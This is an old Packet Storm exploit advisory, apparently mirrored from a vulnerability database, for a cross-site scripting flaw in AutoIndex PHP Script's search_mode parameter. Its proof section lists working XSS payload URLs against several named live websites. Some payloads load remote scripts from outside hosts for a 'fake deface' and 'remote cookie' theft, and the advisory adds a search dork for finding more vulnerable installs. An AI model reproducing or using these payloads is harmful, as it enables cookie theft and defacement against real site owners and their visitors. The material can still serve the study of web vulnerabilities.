Search...

autoindexXSS.txt

2007-08-25T00:00:00

ID PACKETSTORM:58848
Type packetstorm
Reporter d3hrdr8
Modified 2007-08-25T00:00:00

Description

                                        
                                            `  
# Title : AutoIndex PHP Script search_mode Cross-Site Scripting Vulnerability  
  
# Description : AutoIndex PHP Script is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.  
  
# Software : http://autoindex.sourceforge.net/  
  
# Vuln. Version : &lt;= 2.2.1   
  
# Author : d3hydr8  
  
# Contact : d3hydr8[at]gmail[dot]com  
  
# Homepage : http://darkcode.h1x.com  
  
# Original Post : http://darkcode.h1x.com/forum/index.php?action=vthread&forum=12&topic=243  
  
# Dork : intext:"Powered by AutoIndex PHP Script" or inurl:/AutoIndex/index.php  
  
# Greets : mozi, whoami, icqbomber  
  
# Proof :  
  
Simple Alert:  
http://www.flapjack.be/AutoIndex/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E  
http://www.projectopensky.com/files/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E  
http://scizz.com/rhtools/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E  
  
Fake Deface:  
http://buraaq.net/AutoIndex/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E  
  
http://archsymb.com/ruby/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E  
  
cookie:  
http://boxorroxors.net/downloads.php?search=asdf&search_mode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
  
remote cookie:  
http://tor.meulie.net/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3   
  
  
  
  
`

JSON Vulners Source

Initial Source

{"type": "packetstorm", "published": "2007-08-25T00:00:00", "reporter": "d3hrdr8", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "14804b5d8a803d29fbbfb10ef04a0a92"}, {"key": "modified", "hash": "ac24ef1ea599cfd2be2f06a612263858"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "ac24ef1ea599cfd2be2f06a612263858"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "cad90b91d06f21c86696efe21e126a3b"}, {"key": "sourceData", "hash": "2230ac7670f537b40eca0367d401417f"}, {"key": "sourceHref", "hash": "9030b3bd4a52ecbdf070fd8f53b3e799"}, {"key": "title", "hash": "a9494cf72ab298567b2eb0ac0b8d0001"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "` \n# Title : AutoIndex PHP Script search_mode Cross-Site Scripting Vulnerability \n \n# Description : AutoIndex PHP Script is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. \n \n# Software : http://autoindex.sourceforge.net/ \n \n# Vuln. Version : <= 2.2.1 \n \n# Author : d3hydr8 \n \n# Contact : d3hydr8[at]gmail[dot]com \n \n# Homepage : http://darkcode.h1x.com \n \n# Original Post : http://darkcode.h1x.com/forum/index.php?action=vthread&forum=12&topic=243 \n \n# Dork : intext:\"Powered by AutoIndex PHP Script\" or inurl:/AutoIndex/index.php \n \n# Greets : mozi, whoami, icqbomber \n \n# Proof : \n \nSimple Alert: \nhttp://www.flapjack.be/AutoIndex/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E \nhttp://www.projectopensky.com/files/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E \nhttp://scizz.com/rhtools/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E \n \nFake Deface: \nhttp://buraaq.net/AutoIndex/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E \n \nhttp://archsymb.com/ruby/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E \n \ncookie: \nhttp://boxorroxors.net/downloads.php?search=asdf&search_mode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \n \n \nremote cookie: \nhttp://tor.meulie.net/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3 \n \n \n \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:18:45", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/58848/autoindexXSS.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/58848/autoindexXSS.txt", "title": "autoindexXSS.txt", "enchantments": {"vulnersScore": 4.3}, "references": [], "id": "PACKETSTORM:58848", "hash": "1191221bf039355f23a3a188a3c8774a34d75d24dea224f7053eca591e934649", "edition": 1, "cvelist": [], "modified": "2007-08-25T00:00:00", "description": ""}